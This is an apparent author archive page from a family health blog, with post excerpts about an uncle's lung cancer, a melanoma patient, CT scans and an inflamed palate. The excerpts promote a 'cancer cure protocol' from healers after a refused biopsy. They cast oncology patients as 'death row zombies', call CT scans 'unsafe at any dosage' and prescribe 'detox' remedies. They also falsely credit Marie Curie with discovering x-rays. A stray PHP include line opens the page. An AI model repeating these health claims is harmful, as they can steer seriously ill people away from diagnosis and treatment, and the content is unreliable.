@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 85 of 235

Author: Good Samaritan

Uncle A’s Lung Cancer Cause and Cancer Cure Protocol

After going around several healers for analysis, here is what I have summarized as the cause and cure of Uncle A’s lung cancer.  Uncle A is 60. Let me be clear that Uncle A has refused any biopsy to “western medically” determine if the mass / growth in his...

Oncology Clinic and Scary Death Row Zombies

Last weekend I was at Vander Gaditano’s place and bull strong man diagnosed with melanoma cancer was there.  His name was Rudy. He just had a few bumps in his arms and some in his nose which he says causes him to bleed every now and then. Rudy says...

CT Scans are dangerous to your health – Unsafe at any dosage

CT Scans are not cool. Use only when absolutely necessary. Think hundreds to thousands of xray exposures in one ct-scan. Brrr…. scary. Did you know the x-ray discoverer Marie Curie died for her efforts? Radiation poisoning. Not only that, CT-Scanning comes with colored DYE injection to your blood. A...

My Uncle’s Cancer Treatment Will be an Easy Start

My uncle is in town as his siblings are concerned about a mass he has developed. You know the usual mindset, it might be cancer. I saw him. He had lost a lot of weight since more than a year ago. Said his weight loss was pretty recent due...

Inflamed Palate Because of Ear Infection and Cooked Food last Friday

My palate is inflamed. In Tagalog, ngala ngala. I’ve never had this experience before. This is all new to me. Ah well. You learn something every day. What to do? Circulation, detox, remove obstructions. This is how I’m doing it since yesterday. My ear thing, the other night I...